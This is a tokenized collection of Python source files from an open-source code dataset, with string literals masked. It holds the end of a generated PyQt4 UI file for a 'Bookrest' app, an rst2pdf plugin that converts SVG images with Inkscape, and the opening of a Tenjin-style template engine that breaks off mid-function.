actionSettings ) <EOL> self . menuHelp . addAction ( self . actionAbout_Bookrest ) <EOL> self . menuBar . addAction ( self . menuText . menuAction ( ) ) <EOL> self . menuBar . addAction ( self . menuEdit . menuAction ( ) ) <EOL> self . menuBar . addAction ( self . menuView . menuAction ( ) ) <EOL> self . menuBar . addAction ( self . menuHelp . menuAction ( ) ) <EOL> self . toolBar . addAction ( self . actionLoad_Text ) <EOL> self . toolBar . addAction ( self . actionRender ) <EOL> self . toolBar . addAction ( self . actionSettings ) <EOL> self . editbar . addAction ( self . actionUndo1 ) <EOL> self . editbar . addAction ( self . actionUndo2 ) <EOL> self . editbar . addAction ( self . actionRedo1 ) <EOL> self . editbar . addAction ( self . actionRedo2 ) <EOL> self . editbar . addAction ( self . actionCut1 ) <EOL> self . editbar . addAction ( self . actionCut2 ) <EOL> self . editbar . addAction ( self . actionCopy1 ) <EOL> self . editbar . addAction ( self . actionCopy2 ) <EOL> self . editbar . addAction ( self . actionPaste1 ) <EOL> self . editbar . addAction ( self . actionPaste2 ) <EOL> self . retranslateUi ( MainWindow ) <EOL> self . tabs . setCurrentIndex ( <NUM_LIT:0> ) <EOL> QtCore . QMetaObject . connectSlotsByName ( MainWindow ) <EOL> MainWindow . setTabOrder ( self . text , self . tabs ) <EOL> MainWindow . setTabOrder ( self . tabs , self . style ) <EOL> def retranslateUi ( self , MainWindow ) : <EOL> MainWindow . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tabs . setTabText ( self . tabs . indexOf ( self . tab ) , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tabs . setTabText ( self . tabs . indexOf ( self . tab_2 ) , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuText . setTitle ( QtGui . QApplication . 
translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuView . setTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuEdit . setTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuHelp . setTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . toolBar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . pdfbar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . dock . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . editbar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . searchbar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . structure . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tree . headerItem ( ) . setText ( <NUM_LIT:0> , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tree . headerItem ( ) . setText ( <NUM_LIT:1> , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Text . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Text . setToolTip ( QtGui . QApplication . 
translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Text . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Style . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Style . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRender . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Text . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Text . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Text . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Style . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Style . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_PDF . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_PDF . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Text . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Text . setToolTip ( QtGui . QApplication . 
translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Style . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Style . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_PDF . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_PDF . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . 
QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionFind . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionFind . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionAbout_Bookrest . 
setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionTest_Action . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSettings . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> from codeeditor import CodeEditor <EOL> import icons_rc <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> MainWindow = QtGui . QMainWindow ( ) <EOL> ui = Ui_MainWindow ( ) <EOL> ui . setupUi ( MainWindow ) <EOL> MainWindow . show ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys , os , tempfile , subprocess <EOL> from weakref import WeakKeyDictionary <EOL> from rst2pdf . log import log <EOL> from vectorpdf_r2p import VectorPdf <EOL> import rst2pdf . image <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> progname = os . path . expandvars ( r'<STR_LIT>' ) <EOL> else : <EOL> progname = '<STR_LIT>' <EOL> class InkscapeImage ( VectorPdf ) : <EOL> source_filecache = WeakKeyDictionary ( ) <EOL> @ classmethod <EOL> def available ( self ) : <EOL> return True <EOL> def __init__ ( self , filename , width = None , height = None , kind = '<STR_LIT>' , <EOL> mask = None , lazy = True , srcinfo = None ) : <EOL> client , uri = srcinfo <EOL> cache = self . source_filecache . setdefault ( client , { } ) <EOL> pdffname = cache . get ( filename ) <EOL> if pdffname is None : <EOL> tmpf , pdffname = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> os . close ( tmpf ) <EOL> client . to_unlink . append ( pdffname ) <EOL> cache [ filename ] = pdffname <EOL> cmd = [ progname , os . path . abspath ( filename ) , '<STR_LIT>' , pdffname ] <EOL> try : <EOL> subprocess . call ( cmd ) <EOL> except OSError , e : <EOL> log . error ( "<STR_LIT>" , '<STR_LIT:U+0020>' . join ( cmd ) ) <EOL> raise <EOL> self . load_xobj ( ( client , pdffname ) ) <EOL> pdfuri = uri . replace ( filename , pdffname ) <EOL> pdfsrc = client , pdfuri <EOL> VectorPdf . __init__ ( self , pdfuri , width , height , kind , mask , lazy , pdfsrc ) <EOL> @ classmethod <EOL> def raster ( self , filename , client ) : <EOL> """<STR_LIT>""" <EOL> cache = self . source_filecache . setdefault ( client , { } ) <EOL> pngfname = cache . get ( filename + '<STR_LIT>' ) <EOL> if pngfname is None : <EOL> tmpf , pngfname = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> os . close ( tmpf ) <EOL> client . to_unlink . append ( pngfname ) <EOL> cache [ filename + '<STR_LIT>' ] = pngfname <EOL> cmd = [ progname , os . path . 
abspath ( filename ) , '<STR_LIT>' , pngfname , '<STR_LIT>' , str ( client . def_dpi ) ] <EOL> try : <EOL> subprocess . call ( cmd ) <EOL> return pngfname <EOL> except OSError , e : <EOL> log . error ( "<STR_LIT>" , '<STR_LIT:U+0020>' . join ( cmd ) ) <EOL> raise <EOL> return None <EOL> def install ( createpdf , options ) : <EOL> '''<STR_LIT>''' <EOL> rst2pdf . image . SVGImage = InkscapeImage </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" [ <NUM_LIT:6> : - <NUM_LIT:2> ] <EOL> __release__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:html>' , ] <EOL> import re , sys , os , time , marshal <EOL> try : <EOL> import fcntl <EOL> def _lock_file ( file , content ) : <EOL> fcntl . flock ( file . fileno ( ) , fcntl . LOCK_EX ) <EOL> except ImportError , ex : <EOL> try : <EOL> import msvcrt <EOL> def _lock_file ( file , content ) : <EOL> msvcrt . locking ( file . fileno ( ) , msvcrt . LK_LOCK , len ( content ) ) <EOL> except ImportError , ex : <EOL> def _lock_file ( file , content ) : <EOL> pass <EOL> def _write_file_with_lock ( filename , content ) : <EOL> f = None <EOL> try : <EOL> f = open ( filename , '<STR_LIT:wb>' ) <EOL> _lock_file ( f , content ) <EOL> f . write ( content ) <EOL> finally : <EOL> if f : <EOL> f . close ( ) <EOL> def _create_module ( module_name ) : <EOL> """<STR_LIT>""" <EOL> import new <EOL> mod = new . module ( module_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ) <EOL> sys . modules [ module_name ] = mod <EOL> return mod <EOL> def _create_helpers_module ( ) : <EOL> def to_str ( val ) : <EOL> """<STR_LIT>""" <EOL> if val is None : return '<STR_LIT>' <EOL> if isinstance ( val , str ) : return val <EOL> if isinstance ( val , unicode ) : return val <EOL> return str ( val ) <EOL> def generate_tostrfunc ( encoding ) : <EOL> """<STR_LIT>""" <EOL> def to_str ( val ) : <EOL> if val is None : return '<STR_LIT>' <EOL> if isinstance ( val , str ) : return val <EOL> if isinstance ( val , unicode ) : return val . encode ( encoding ) <EOL> return str ( val ) <EOL> return to_str <EOL> def echo ( string ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> context [ '<STR_LIT>' ] . append ( string ) <EOL> def start_capture ( varname = None ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . 
_getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> context [ '<STR_LIT>' ] = context [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = varname <EOL> context [ '<STR_LIT>' ] = [ ] <EOL> def stop_capture ( store_to_context = True ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> result = '<STR_LIT>' . join ( context [ '<STR_LIT>' ] ) <EOL> context [ '<STR_LIT>' ] = context . pop ( '<STR_LIT>' ) <EOL> varname = context . pop ( '<STR_LIT>' ) <EOL> if varname : <EOL> context [ varname ] = result <EOL> if store_to_context : <EOL> context [ '<STR_LIT>' ] [ varname ] = result <EOL> return result <EOL> def captured_as ( name ) : <EOL> """<STR_LIT>""" <EOL> frame = sys . _getframe ( <NUM_LIT:1> ) <EOL> context = frame . f_locals <EOL> if context . has_key ( name ) : <EOL> _buf = context [ '<STR_LIT>' ] <EOL> _buf . append ( context [ name ] ) <EOL> return True <EOL> return False <EOL> def _p ( arg ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % arg <EOL> def _P ( arg ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % arg <EOL> def _decode_params ( s ) : <EOL> """<STR_LIT>""" <EOL> from urllib import unquote <EOL> dct = { '<STR_LIT>' : '<STR_LIT:<>' , '<STR_LIT>' : '<STR_LIT:>>' , '<STR_LIT>' : '<STR_LIT:&>' , '<STR_LIT>' : '<STR_LIT:">' , '<STR_LIT>' : "<STR_LIT:'>" , } <EOL> def unescape ( s ) : <EOL> return re . sub ( r'<STR_LIT>' , lambda m : dct [ m . group ( <NUM_LIT:1> ) ] , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unquote ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unquote ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unescape ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , lambda m : '<STR_LIT>' % unescape ( m . group ( <NUM_LIT:1> ) ) , s ) <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> s = re . 
sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> return s <EOL> mod = _create_module ( '<STR_LIT>' ) <EOL> mod . to_str = to_str <EOL> mod . generate_tostrfunc = generate_tostrfunc <EOL> mod . echo = echo <EOL> mod . start_capture = start_capture <EOL> mod . stop_capture = stop_capture <EOL> mod . captured_as = captured_as <EOL> mod . _p = _p <EOL> mod . _P = _P <EOL> mod . _decode_params = _decode_params <EOL> mod . __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> return mod <EOL> helpers = _create_helpers_module ( ) <EOL> del _create_helpers_module <EOL> generate_tostrfunc = helpers . generate_tostrfunc <EOL> def _create_html_module ( ) : <EOL> to_str = helpers . to_str <EOL> _escape_table = { '<STR_LIT:&>' : '<STR_LIT>' , '<STR_LIT:<>' : '<STR_LIT>' , '<STR_LIT:>>' : '<STR_LIT>' , '<STR_LIT:">' : '<STR_LIT>' } <EOL> _escape_pattern = re . compile ( r'<STR_LIT>' ) <EOL> _escape_callable = lambda m : _escape_table [ m . group ( <NUM_LIT:0> ) ] <EOL> def escape_xml ( s ) : <EOL> """<STR_LIT>""" <EOL> return _escape_pattern . sub ( _escape_callable , s ) <EOL> def tagattr ( name , expr , value = None , escape = True ) : <EOL> """<STR_LIT>""" <EOL> if not expr : <EOL> return '<STR_LIT>' <EOL> if value is None : <EOL> value = to_str ( expr ) <EOL> else : <EOL> value = to_str ( value ) <EOL> if escape : <EOL> value = escape_xml ( value ) <EOL> return '<STR_LIT>' % ( name , value ) <EOL> def checked ( expr ) : <EOL> """<STR_LIT>""" <EOL> return expr and '<STR_LIT>' or '<STR_LIT>' <EOL> def selected ( expr ) : <EOL> """<STR_LIT>""" <EOL> return expr and '<STR_LIT>' or '<STR_LIT>' <EOL> def disabled ( expr ) : <EOL> """<STR_LIT>""" <EOL> return expr and '<STR_LIT>' or '<STR_LIT>' <EOL> def nl2br ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return '<STR_LIT>' <EOL> return text . 
replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def text2html ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return '<STR_LIT>' <EOL> return nl2br ( escape_xml ( text ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) ) <EOL> mod = _create_module ( '<STR_LIT>' ) <EOL> mod . _escape_table = _escape_table <EOL> mod . escape_xml = escape_xml <EOL> mod . escape = escape_xml <EOL> mod . tagattr = tagattr <EOL> mod . checked = checked <EOL> mod . selected = selected <EOL> mod . disabled = disabled <EOL> mod . nl2br = nl2br <EOL> mod . text2html = text2html <EOL> return mod <EOL> helpers . html = _create_html_module ( ) <EOL> del _create_html_module <EOL> helpers . escape = helpers . html . escape_xml <EOL> class Template ( object ) : <EOL> """<STR_LIT>""" <EOL> filename = None <EOL> encoding = None <EOL> escapefunc = '<STR_LIT>' <EOL> tostrfunc = '<STR_LIT>' <EOL> indent = <NUM_LIT:4> <EOL> preamble = None <EOL> postamble = None <EOL> smarttrim = None <EOL> args = None <EOL> def __init__ ( self , filename = None , encoding = None , escapefunc = None , tostrfunc = None , indent = None , preamble = None , postamble = None , smarttrim = None ) : <EOL> """<STR_LIT>""" <EOL> if encoding is not None : self . encoding = encoding <EOL> if escapefunc is not None : self . escapefunc = escapefunc <EOL> if tostrfunc is not None : self . tostrfunc = tostrfunc <EOL> if indent is not None : self . indent = indent <EOL> if preamble is not None : self . preamble = preamble <EOL> if postamble is not None : self . postamble = postamble <EOL> if smarttrim is not None : self . smarttrim = smarttrim <EOL> if preamble is True : self . preamble = "<STR_LIT>" <EOL> if postamble is True : self . postamble = "<STR_LIT>" <EOL> if filename : <EOL> self . convert_file ( filename ) <EOL> else : <EOL> self . _reset ( ) <EOL> def _reset ( self , input = None , filename = None ) : <EOL> self . _spaces = '<STR_LIT>' <EOL> self . script = None <EOL> self . bytecode = None <EOL> self . 
input = input <EOL> self . filename = filename <EOL> if input != None : <EOL> i = input . find ( "<STR_LIT:\n>" ) <EOL> if i < <NUM_LIT:0> : <EOL> self . newline = "<STR_LIT:\n>" <EOL> elif len ( input ) >= <NUM_LIT:2> and input [ i - <NUM_LIT:1> ] == "<STR_LIT:\r>" : <EOL> self . newline = "<STR_LIT:\r\n>" <EOL> else : <EOL> self . newline = "<STR_LIT:\n>" <EOL> def before_convert ( self , buf ) : <EOL> if self . preamble : <EOL> buf . append ( self . preamble ) <EOL> buf . append ( self . input . startswith ( '<STR_LIT>' ) and "<STR_LIT:\n>" or "<STR_LIT>" ) <EOL> def after_convert ( self , buf ) : <EOL> if self . postamble : <EOL> if not buf [ - <NUM_LIT:1> ] . endswith ( "<STR_LIT:\n>" ) : <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> buf . append ( self . postamble + "<STR_LIT:\n>" ) <EOL> def convert_file ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> input = open ( filename , '<STR_LIT:rb>' ) . read ( ) <EOL> return self . convert ( input , filename ) <EOL> def convert ( self , input , filename = None ) : <EOL> """<STR_LIT>""" <EOL> if self . encoding and isinstance ( input , str ) : <EOL> input = input . decode ( self . encoding ) <EOL> self . _reset ( input , filename ) <EOL> buf = [ ] <EOL> self . before_convert ( buf ) <EOL> self . parse_stmts ( buf , input ) <EOL> self . after_convert ( buf ) <EOL> script = '<STR_LIT>' . join ( buf ) <EOL> self . script = script <EOL> return script <EOL> def compile_stmt_pattern ( pi ) : <EOL> return re . compile ( r'<STR_LIT>' % pi , re . S ) <EOL> STMT_PATTERN = compile_stmt_pattern ( '<STR_LIT>' ) <EOL> compile_stmt_pattern = staticmethod ( compile_stmt_pattern ) <EOL> def stmt_pattern ( self ) : <EOL> return Template . STMT_PATTERN <EOL> def parse_stmts ( self , buf , input ) : <EOL> if not input : <EOL> return <EOL> rexp = self . stmt_pattern ( ) <EOL> is_bol = True <EOL> index = <NUM_LIT:0> <EOL> for m in rexp . finditer ( input ) : <EOL> mspace , code , rspace = m . groups ( ) <EOL> text = input [ index : m . 
start ( ) ] <EOL> index = m . end ( ) <EOL> lspace = None <EOL> if text == '<STR_LIT>' : <EOL> if is_bol : <EOL> lspace = '<STR_LIT>' <EOL> elif text [ - <NUM_LIT:1> ] == '<STR_LIT:\n>' : <EOL> lspace = '<STR_LIT>' <EOL> else : <EOL> rindex = text . rfind ( '<STR_LIT:\n>' ) <EOL> if rindex < <NUM_LIT:0> : <EOL> if is_bol and text . isspace ( ) : <EOL> lspace = text <EOL> text = '<STR_LIT>' <EOL> else : <EOL> s = text [ rindex + <NUM_LIT:1> : ] <EOL> if s . isspace ( ) : <EOL> lspace = s <EOL> text = text [ : rindex + <NUM_LIT:1> ] <EOL> self . parse_exprs ( buf , text , is_bol ) <EOL> is_bol = rspace is not None <EOL> if lspace : <EOL> buf . append ( lspace ) <EOL> if mspace != "<STR_LIT:U+0020>" : <EOL> buf . append ( mspace == "<STR_LIT:\t>" and "<STR_LIT:\t>" or "<STR_LIT:\n>" ) <EOL> if code : <EOL> code = self . statement_hook ( code ) <EOL> self . add_stmt ( buf , code ) <EOL> self . _set_spaces ( code , lspace , mspace ) <EOL> if rspace : <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> rest = input [ index : ] <EOL> if rest : <EOL> self . parse_exprs ( buf , rest ) <EOL> def statement_hook ( self , stmt ) : <EOL> """<STR_LIT>""" <EOL> if self . args is None : <EOL> args_pattern = r'<STR_LIT>' <EOL> m = re . match ( args_pattern , stmt ) <EOL> if m : <EOL> arr = ( m . group ( <NUM_LIT:1> ) or '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) <EOL> args = [ ] ; declares = [ ] <EOL> for s in arr : <EOL> arg = s . strip ( ) <EOL> if not s : continue <EOL> if not re . match ( '<STR_LIT>' , arg ) : <EOL> raise ValueError ( "<STR_LIT>" % arg ) <EOL> args . append ( arg ) <EOL> declares . append ( "<STR_LIT>" % ( arg , arg ) ) <EOL> self . args = args <EOL> return '<STR_LIT>' . join ( declares ) <EOL> return stmt <EOL> EXPR_PATTERN = re . compile ( r'<STR_LIT>' , re . S ) <EOL> def expr_pattern ( self ) : <EOL> return Template . EXPR_PATTERN <EOL> def get_expr_and_escapeflag ( self , match ) : <EOL> return match . group ( <NUM_LIT:2> ) , match . 
group ( <NUM_LIT:1> ) == '<STR_LIT:$>' <EOL> def parse_exprs ( self , buf , input , is_bol = False ) : <EOL> if not input : <EOL> return <EOL> if self . _spaces : <EOL> buf . append ( self . _spaces ) <EOL> self . start_text_part ( buf ) <EOL> rexp = self . expr_pattern ( ) <EOL> smarttrim = self . smarttrim <EOL> nl = self . newline <EOL> nl_len = len ( nl ) <EOL> pos = <NUM_LIT:0> <EOL> for m in rexp . finditer ( input ) : <EOL> start = m . start ( ) <EOL> text = input [ pos : start ] <EOL> pos = m . end ( ) <EOL> expr , flag_escape = self . get_expr_and_escapeflag ( m ) <EOL> if text : <EOL> self . add_text ( buf , text ) <EOL> self . add_expr ( buf , expr , flag_escape ) <EOL> if smarttrim : <EOL> flag_bol = text . endswith ( nl ) or not text and ( start > <NUM_LIT:0> or is_bol ) <EOL> if flag_bol and not flag_escape and input [ pos : pos + nl_len ] == nl : <EOL> pos += nl_len <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> if smarttrim : <EOL> if buf and buf [ - <NUM_LIT:1> ] == "<STR_LIT:\n>" : <EOL> buf . pop ( ) <EOL> rest = input [ pos : ] <EOL> if rest : <EOL> self . add_text ( buf , rest , True ) <EOL> self . stop_text_part ( buf ) <EOL> if input [ - <NUM_LIT:1> ] == '<STR_LIT:\n>' : <EOL> buf . append ( "<STR_LIT:\n>" ) <EOL> def start_text_part ( self , buf ) : <EOL> buf . append ( "<STR_LIT>" ) <EOL> def stop_text_part ( self , buf ) : <EOL> buf . append ( "<STR_LIT>" ) <EOL> _quote_rexp = re . compile ( r"<STR_LIT>" ) <EOL> def add_text ( self , buf , text , encode_newline = False ) : <EOL> if not text : <EOL> return ; <EOL> if self . encoding : <EOL> buf . append ( "<STR_LIT>" ) <EOL> else : <EOL> buf . append ( "<STR_LIT>" ) <EOL> text = Template . _quote_rexp . sub ( r"<STR_LIT>" , text ) <EOL> if not encode_newline or text [ - <NUM_LIT:1> ] != "<STR_LIT:\n>" : <EOL> buf . append ( text ) <EOL> buf . append ( "<STR_LIT>" ) <EOL> elif len ( text ) >= <NUM_LIT:2> and text [ - <NUM_LIT:2> ] == "<STR_LIT:\r>" : <EOL> buf . 
